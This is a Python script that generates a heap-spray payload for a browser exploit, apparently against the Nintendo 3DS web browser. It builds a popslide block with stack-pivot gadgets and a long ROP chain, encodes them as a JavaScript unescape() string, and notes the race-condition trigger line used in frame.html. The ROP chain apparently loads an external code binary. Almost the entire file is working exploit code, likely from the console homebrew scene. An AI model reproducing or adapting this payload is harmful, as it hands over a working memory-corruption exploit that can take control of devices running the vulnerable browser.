import os,sys,random,struct
#this script generates the 'var a=unescape(" ...' unicode string used in index.html (and sprayed 400 times). this is the main exploit handling code.
#the below line in frame.html is what triggers the exploit
#parent.document.documentElement.lastChild.appendChild(parent.document.adoptNode(document.getElementsByTagName("div")[0]));
#note that this exploit is timing sensitive (race condition) so slight alterations of anything can lead to different outcomes.
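# Size in bytes of the sprayed block; it is built one 32-bit word at a time,
# so the list below holds SPRAY_BYTES // 4 entries.  (Renamed from `iter`,
# which shadowed the builtin of the same name.)
SPRAY_BYTES = 0x10000

# Start from a block filled entirely with one word, then overwrite a handful
# of fixed positions.  The index expressions are byte offsets into the block,
# hence the `// 4`; the trailing comments are the original author's labels.
payload = [0x00105788] * (SPRAY_BYTES // 4)  # popslide
payload[0xb90//4]=0x00e1f804 #r0 setup gadget for stack pivot:
payload[0xbec//4]=0x08bbc080 #stack pivot base addr
payload[0xc80//4]=0x08bbc080 #''
payload[0xe04//4]=0x00130efc #stack pivot
payload[0xcb4//4]=0x08bbc210 #rop heap addr
payload[0xcb8//4]=0x88888888 #junk lr
payload[0xcbc//4]=0x00105788 #poppc

#generated from https://github.com/yellows8/3ds_browserhax_common
rop=[0x00130f14, 0x00105788, 0x001050f4, 0x09320000, 0x019314ff, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00104098, 0x00130f14, 0x00105788, 0x001050f4, 0x00202a04, 0x09320000, 0x00000004, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0011e114, 0x00130f14, 0x00105788, 0x001050f4, 0x18b40000, 0x00010000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea308, 0x00130f14, 0x00105788, 0x001050f4, 0x09320000, 0x00000014, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea308, 0x00130f14, 0x00105788, 0x0018dbe4, 0x09320010, 0x00640073, 0x0063006d, 0x002f003a, 0x00720061, 0x0031006d, 0x00630031, 0x0064006f, 0x002e0065, 0x00690062, 0x0000006e, 0x00000000, 0x00000000, 0x001bc690, 0x00130f14, 0x00105788, 0x001050f4, 0x09320040, 0x09320014, 0x00000030, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea190, 0x00130f14, 0x00105788, 0x001050f4, 0x09320000, 0x09320040, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0022ffb0, 0x001a01f0, 0x00000000, 0x00130f14, 0x00105788, 0x001050f4, 0x09320000, 0x09320020, 0x18b41000, 0x00008000, 0x00000000, 0x00000000, 0x00000000, 0x001698bc, 0x001a01f0, 0x00000000, 0x0010c330, 0x09320000, 0x00130f14, 0x00105788, 0x0011169c, 0x00130f14, 0x00105788, 0x00101e78, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x001fdb78, 0x00130f14, 0x00105788, 0x001050f4, 0x18b41000, 0x00008000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00192568, 0x00130f14, 0x00105788, 0x0018dbe4, 0x09320010, 0x00000000, 0x00152c48, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0023c844, 0x0011dd0c, 0x00192568, 0x0022ffb0, 0x001fdb78, 0x0020757c, 0x001bc690, 0x00130f14, 0x00105788, 0x001050f4, 0x18b40000, 0x09320014, 0x00000030, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea190, 0x00130f14, 0x00105788, 0x0018dbe4, 0x09320010, 0x00000000, 0x001698bc, 0x00169944, 0x0011e114, 0x00000000, 0x00000000, 0x00000040, 0x00000000, 0x00000000, 0x00000000, 0x003dd72c,
     0x00000114, 0x001bc690, 0x00130f14, 0x00105788, 0x001050f4, 0x18b40030, 0x09320014, 0x00000030, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea190, 0x00130f14, 0x00105788, 0x0018dbe4, 0x09320010, 0x00000000, 0x18b41000, 0x007e83bc, 0x009eae98, 0x009eaea0, 0x009eaec8, 0x009eaa28, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x001bc690, 0x00130f14, 0x00105788, 0x001050f4, 0x18b40060, 0x09320014, 0x00000030, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x009ea190, 0x00130f14, 0x001050f4, 0x001050f4, 0x18b41000, 0x193a56e0, 0x00008000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0011dd0c, 0x00000000, 0x00000000, 0x00000000, 0x00000008, 0x00000000, 0x00000000, 0x00000000, 0x00130f14, 0x00105788, 0x001050f4, 0x3b9aca00, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x001041c8, 0x00130f14, 0x00105788, 0x001050f4, 0x09320000, 0x01808080, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00104098, 0x00130f14, 0x001050f4, 0x001050f4, 0x00202a04, 0x09320000, 0x00000004, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0011e114, 0x18b40000, 0x0fff9000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00130f14, 0x00105788, 0x007e86e0, 0x70707070]

# Copy the `rop` words into the block starting at byte offset 0xe10.  A
# same-length slice assignment replaces the entries in place; the explicit
# bounds check keeps the block from silently growing past SPRAY_BYTES if
# `rop` is ever edited to be longer than the room that is left.
ROP_OFFSET = 0xe10 // 4
if ROP_OFFSET + len(rop) > len(payload):
    raise ValueError(
        "rop list (%d words) does not fit at offset %#x within %#x bytes"
        % (len(rop), 0xe10, SPRAY_BYTES)
    )
payload[ROP_OFFSET:ROP_OFFSET + len(rop)] = rop

# Every word must fit in 32 bits, otherwise the %04X fields below would
# emit more than four hex digits and corrupt the \u escapes that follow.
for word in payload:
    if not 0 <= word <= 0xFFFFFFFF:
        raise ValueError("payload word out of 32-bit range: %#x" % word)

# Serialise the block as a JavaScript unescape() literal.  Each 32-bit word
# becomes two \uXXXX escapes with the low 16 bits first, so the bytes land
# in memory in little-endian order.  str.join is used instead of repeated
# `+=` so the build is linear rather than quadratic in the block size.
body = "".join(
    "\\u%04X\\u%04X" % (word & 0xFFFF, word >> 16) for word in payload
)
st = 'var a=unescape("' + body + '");'

# Emit the literal on stdout and into un1.txt; the literal is pure ASCII.
print(st)
with open("un1.txt", "w", encoding="utf-8") as f:
    f.write(st)
#531c 531C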